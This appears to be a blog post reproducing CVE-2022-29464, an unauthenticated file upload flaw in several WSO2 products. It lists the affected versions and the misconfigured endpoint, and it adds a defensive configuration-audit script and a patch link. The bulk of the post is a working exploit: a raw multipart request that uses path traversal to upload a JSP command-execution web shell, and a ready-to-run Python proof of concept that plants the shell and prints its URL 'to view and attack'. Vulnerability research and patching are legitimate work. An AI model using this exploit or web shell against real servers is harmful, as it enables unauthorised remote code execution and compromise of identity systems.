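CVE-2022-29464 WSO2 File Upload Vulnerability

I. Vulnerability Overview

The WSO2 file upload vulnerability (CVE-2022-29464) is a critical vulnerability in WSO2 discovered by Orange Tsai. It is an unauthenticated, unrestricted arbitrary file upload that allows an unauthenticated attacker to gain RCE on a WSO2 server by uploading a malicious JSP file.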

II. Affected Versions

  • WSO2 API Manager 2.2.0 and above, up to 4.0.0
  • WSO2 Identity Server 5.2.0 and above, up to 5.11.0
  • WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0 and 5.6.0
  • WSO2 Identity Server as Key Manager 5.3.0 and above, up to 5.10.0
  • WSO2 Enterprise Integrator 6.2.0 and above, up to 6.6.0

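III. How the Vulnerability Works

  In the WSO2 configuration file WSO2AM_Home\repository\conf\identity\identity.xml, the secured attribute on the entry for the /fileupload(.*) endpoint is set to false. This means the route can be accessed without authentication, so a crafted malicious POST request can be used to upload a malicious JSP file. For details, see the expert's article linked here~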
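As an added example (not part of the original post and not WSO2's own code), the check below audits an identity.xml for rules that are not marked secured="true" yet cover a path that must require authentication, such as /fileupload/toolsAny. The sample XML is constructed, and the ResourceAccessControl/Resource element names, the context attribute and the namespace are assumptions about the file's layout.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample, not taken from a real deployment. The element names,
# the `context` attribute and the namespace are assumptions about the layout.
SAMPLE_IDENTITY_XML = """<Server xmlns="urn:example:constructed">
  <ResourceAccessControl>
    <Resource context="(.*)/carbon/admin/login.jsp(.*)" secured="false"/>
    <Resource context="(.*)/fileupload(.*)" secured="false"/>
    <Resource context="(.*)/api/identity/user/(.*)" secured="true"/>
  </ResourceAccessControl>
</Server>
"""

# Request paths that must never be reachable without authentication.
SENSITIVE_PATHS = ["/fileupload/toolsAny"]


def local_name(tag):
    """Drop an XML namespace prefix such as '{uri}Resource'."""
    return tag.rsplit("}", 1)[-1]


def unauthenticated_matches(xml_text, paths=SENSITIVE_PATHS):
    """Return (context, path) pairs where an unsecured rule covers a path."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if local_name(elem.tag) != "Resource":
            continue
        # Assumption: a rule without an explicit secured="true" is reported.
        if elem.get("secured", "").strip().lower() == "true":
            continue
        context = elem.get("context", "")
        try:
            pattern = re.compile(context)
        except re.error:
            findings.append((context, "<invalid pattern, review manually>"))
            continue
        findings.extend((context, p) for p in paths if pattern.fullmatch(p))
    return findings


if __name__ == "__main__":
    for context, path in unauthenticated_matches(SAMPLE_IDENTITY_XML):
        print(f"no authentication required: rule {context!r} covers {path}")
```

Extend SENSITIVE_PATHS with any other endpoints that should sit behind authentication in a given deployment.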

 

IV. Reproduction Environment

Kali Linux + Vulfocus
Attacker machine: Kali Linux
Target machine: Vulfocus

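V. Steps

1. Start the image environment and visit WSO2 at https://ip:port/carbon/admin/login.jsp

2. Capture the traffic and construct the exploit request. If the response contains a number like the following, the file upload succeeded (the file uploaded here is wavesky.jsp)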

POST /fileupload/toolsAny HTTP/1.1
Host: 192.168.117.131:16630
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 905
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0


--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp"

<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--

3. Linux commands can now be executed to view the internal configuration

VI. Remediation

Update to a secure version: https://github.com/wso2/product-apim/releases

VII. PoC

import requests
import argparse

def exploit(url):
    uurl = "https://"+url+"/fileupload/toolsAny"
    shell = """<FORM>
        <INPUT name='cmd' type=text>
        <INPUT type=submit value='Run'>
    </FORM>
    <%@ page import="java.io.*" %>
        <%
        String cmd = request.getParameter("cmd");
        String output = "";
        if(cmd != null) {
            String s = null;
            try {
                Process p = Runtime.getRuntime().exec(cmd,null,null);
                BufferedReader sI = new BufferedReader(new
    InputStreamReader(p.getInputStream()));
                while((s = sI.readLine()) != null) { output += s+"</br>"; }
            }  catch(IOException e) {   e.printStackTrace();   }
        }
    %>
            <pre><%=output %></pre>"""

    files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp": shell}
    response = requests.post(url=uurl,files=files,verify=False)
    if(response.status_code == 200):
        print('It looks likely vulnerable')
        print('Please use this url:'+'{\33[91m'+'https://'+url+'/authenticationendpoint/wavesky.jsp'+'\33[0m}'+' to view and attack~')
    else:
        print('It is strong')

if __name__ == '__main__':
    parameter = argparse.ArgumentParser(description='Poc CVE-2022-29464:')
    parameter.add_argument('--file',help='url file',required=False)
    parameter.add_argument('--url',help='ip:port',required=False)
    para = parameter.parse_args()

    if para.url:
        exploit(para.url)
        exit()
    else:
        parameter.print_help()

Github: https://github.com/wave-to/Poc/blob/main/FileUpload/CVE-2022-29464.py
posted @ 2022-07-23 18:00  wavesky